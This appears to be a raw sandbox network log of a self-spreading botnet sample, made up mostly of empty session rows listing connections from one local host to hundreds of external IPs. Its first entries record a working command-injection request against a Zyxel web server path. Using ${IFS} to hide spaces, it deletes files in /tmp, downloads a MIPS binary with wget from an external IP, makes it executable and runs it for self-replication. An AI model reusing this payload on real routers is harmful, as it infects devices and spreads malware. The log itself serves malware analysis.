                                                Jan 28, 2024 10:16:45.115307093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9531192.168.2.2340562106.2.133.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115334988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9532192.168.2.2339522148.61.127.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:45.115335941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9533192.168.2.2358460158.153.0.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9534192.168.2.2333764211.230.220.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9535192.168.2.2341160181.188.65.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9536192.168.2.234694897.116.133.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9537192.168.2.234123051.127.198.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9538192.168.2.2337060152.41.63.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9539192.168.2.2359290147.63.225.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9540192.168.2.2342916143.38.101.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9541192.168.2.233553813.116.233.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9542192.168.2.2338826126.32.230.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9543192.168.2.234154487.99.203.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9544192.168.2.235450432.106.174.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9545192.168.2.2337094206.68.200.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9546192.168.2.234845093.238.229.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9547192.168.2.236033481.64.167.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9548192.168.2.235532425.155.2.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9549192.168.2.2341664223.196.42.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9550192.168.2.2359632105.241.46.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9551192.168.2.235580878.125.189.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9552192.168.2.235313047.234.175.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9553192.168.2.2338610182.25.218.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9554192.168.2.233297623.7.205.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9555192.168.2.2347042114.57.26.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9556192.168.2.2358780110.237.13.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9557192.168.2.2342358213.121.26.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9558192.168.2.233949697.158.142.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9559192.168.2.2347396106.251.246.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9560192.168.2.234475642.102.143.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9561192.168.2.23440262.187.114.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9562192.168.2.2348872169.106.25.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9563192.168.2.2356758171.174.34.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9564192.168.2.235445412.179.116.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9565192.168.2.2343220105.10.137.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9566192.168.2.2357774117.91.148.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9567192.168.2.2338916187.96.120.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9568192.168.2.2345606221.43.163.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9569192.168.2.233537834.30.70.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9570192.168.2.234317289.227.218.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9571192.168.2.2333842118.33.33.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9572192.168.2.2360486102.72.132.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9573192.168.2.236068285.146.204.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9574192.168.2.2355252139.245.74.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9575192.168.2.233535013.14.241.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9576192.168.2.2333958106.52.91.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9577192.168.2.234115259.52.101.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9578192.168.2.2350220182.231.27.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9579192.168.2.2347398218.112.1.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9580192.168.2.2358558223.45.76.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9581192.168.2.2360494109.219.94.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9582192.168.2.234840062.148.239.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9583192.168.2.234661634.231.25.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9584192.168.2.2357892167.88.134.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9585192.168.2.2351702152.201.122.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9586192.168.2.2356678219.74.161.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9587192.168.2.2355274110.243.138.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9588192.168.2.2358190223.9.115.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9589192.168.2.234735680.213.231.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9590192.168.2.2356768217.219.35.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9591192.168.2.234711213.98.228.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9592192.168.2.2335504115.236.75.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9593192.168.2.2337348173.63.33.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9594192.168.2.2340762161.177.202.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9595192.168.2.2333284167.103.73.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9596192.168.2.2342322212.90.248.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9597192.168.2.235261045.183.147.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9598192.168.2.2360474104.127.169.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9599192.168.2.2337640118.52.131.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9600192.168.2.2357100172.149.230.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9601192.168.2.235561293.123.184.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9602192.168.2.2359520114.255.188.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9603192.168.2.2352718128.132.69.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9604192.168.2.235488042.3.163.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9605192.168.2.235595832.138.26.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9606192.168.2.2349794158.245.177.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9607192.168.2.233653281.166.187.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9608192.168.2.234957261.140.15.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9609192.168.2.235619057.244.66.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9610192.168.2.2339808115.202.26.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9611192.168.2.2334356163.38.44.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9612192.168.2.2344282185.76.160.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9613192.168.2.235452670.86.12.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9614192.168.2.2349776155.224.16.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9615192.168.2.236097275.96.235.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9616192.168.2.2354412206.17.190.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9617192.168.2.235661636.126.78.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9618192.168.2.234747087.166.131.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9619192.168.2.2338686216.98.88.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9620192.168.2.234945886.35.7.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9621192.168.2.2353834213.142.235.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9622192.168.2.2351184164.217.170.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9623192.168.2.23379902.116.117.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9624192.168.2.2357784119.119.205.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9625192.168.2.2343940162.51.123.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9626192.168.2.234718665.63.220.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9627192.168.2.2353760210.215.99.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9628192.168.2.2340500171.193.62.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9629192.168.2.2340790101.140.72.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9630192.168.2.2356726223.159.85.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9631192.168.2.2349020156.249.94.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9632192.168.2.2336022180.135.99.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9633192.168.2.235404618.129.248.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9634192.168.2.2337450180.124.52.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9635192.168.2.2342064195.160.197.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9636192.168.2.2349214222.7.177.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9637192.168.2.2333916119.106.189.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9638192.168.2.233854241.225.102.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9639192.168.2.2360732211.49.41.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9640192.168.2.2344526159.173.55.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9641192.168.2.234079851.82.6.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9642192.168.2.234332867.75.97.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9643192.168.2.2333068109.24.48.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9644192.168.2.2355570110.56.39.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9645192.168.2.233921275.139.90.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9646192.168.2.235040464.103.183.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9647192.168.2.2336512143.19.172.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9648192.168.2.2357288180.234.185.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9649192.168.2.2338556181.142.97.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9650192.168.2.234706870.104.88.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9651192.168.2.2356256112.221.19.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9652192.168.2.233655023.55.91.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9653192.168.2.2347868177.162.116.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9654192.168.2.2344502206.204.184.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9655192.168.2.233702870.101.30.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9656192.168.2.2334310195.88.24.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9657192.168.2.2356618167.194.215.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9658192.168.2.2336126130.171.7.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9659192.168.2.2354608160.102.59.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9660192.168.2.233417425.10.14.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9661192.168.2.234003670.119.137.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9662192.168.2.2347190161.66.59.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9663192.168.2.2334750167.35.193.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9664192.168.2.233740236.56.92.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9665192.168.2.2337204172.53.52.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9666192.168.2.233357646.216.249.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9667192.168.2.234206027.252.148.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9668192.168.2.2340446146.79.8.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9669192.168.2.235490618.114.185.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9670192.168.2.2359030137.61.129.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9671192.168.2.2337364180.196.213.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9672192.168.2.2350628209.97.183.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9673192.168.2.2338554221.30.103.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9674192.168.2.2346066192.237.164.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9675192.168.2.2353224178.87.252.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9676192.168.2.234866695.133.170.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9677192.168.2.234736651.172.54.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9678192.168.2.2345534217.18.47.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9679192.168.2.235046883.135.93.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9680192.168.2.2344392152.73.196.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9681192.168.2.2342768206.183.29.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9682192.168.2.2355670198.216.218.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9683192.168.2.2356770106.168.54.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9684192.168.2.234978439.79.25.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9685192.168.2.2354410132.103.235.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9686192.168.2.2359100143.166.56.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9687192.168.2.2360488124.236.177.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9688192.168.2.2355374177.217.143.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9689192.168.2.233604888.99.171.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9690192.168.2.2356646108.129.76.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9691192.168.2.233367099.14.17.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9692192.168.2.2360836142.183.4.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9693192.168.2.2346548149.30.101.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9694192.168.2.2339346138.8.232.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9695192.168.2.2339548158.255.184.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9696192.168.2.234392613.254.221.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9697192.168.2.233309681.95.104.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9698192.168.2.233641467.58.40.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9699192.168.2.2334158148.137.159.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9700192.168.2.235118698.182.144.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9701192.168.2.233972220.195.223.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9702192.168.2.233861696.22.231.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9703192.168.2.23346125.70.117.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9704192.168.2.234611278.21.126.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9705192.168.2.2344878152.89.100.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9706192.168.2.23582901.227.75.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9707192.168.2.2352128216.157.138.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9708192.168.2.2360870107.79.38.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9709192.168.2.2340096184.144.255.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9710192.168.2.2351110128.90.226.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9711192.168.2.2342128129.85.36.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9712192.168.2.2346206175.2.252.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9713192.168.2.235640486.77.14.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9714192.168.2.234222896.21.171.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9715192.168.2.2359762183.214.181.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9716192.168.2.233858434.201.30.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9717192.168.2.2355418106.108.107.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9718192.168.2.2349998200.42.18.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9719192.168.2.2356336146.121.235.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9720192.168.2.234582454.125.96.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9721192.168.2.233859248.36.142.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9722192.168.2.2354678219.65.123.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9723192.168.2.2348664119.180.135.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9724192.168.2.234677248.254.199.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9725192.168.2.235696027.110.142.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9726192.168.2.235111025.2.139.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9727192.168.2.2335030130.53.114.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9728192.168.2.2349544162.115.16.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9729192.168.2.234278666.32.103.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9730192.168.2.2345292194.90.214.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9731192.168.2.233562877.108.20.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9732192.168.2.235284014.127.77.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9733192.168.2.234176817.50.231.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9734192.168.2.235917617.91.227.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9735192.168.2.235605474.61.88.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9736192.168.2.2335690172.132.129.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9737192.168.2.234541269.207.203.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9738192.168.2.2334382185.203.191.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9739192.168.2.234675864.90.35.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9740192.168.2.2336496128.139.164.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9741192.168.2.2335992103.8.125.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9742192.168.2.2355844111.161.225.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9743192.168.2.235786612.56.141.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9744192.168.2.2337684150.231.185.152443
                                                TimestampBytes transferredDirectionData


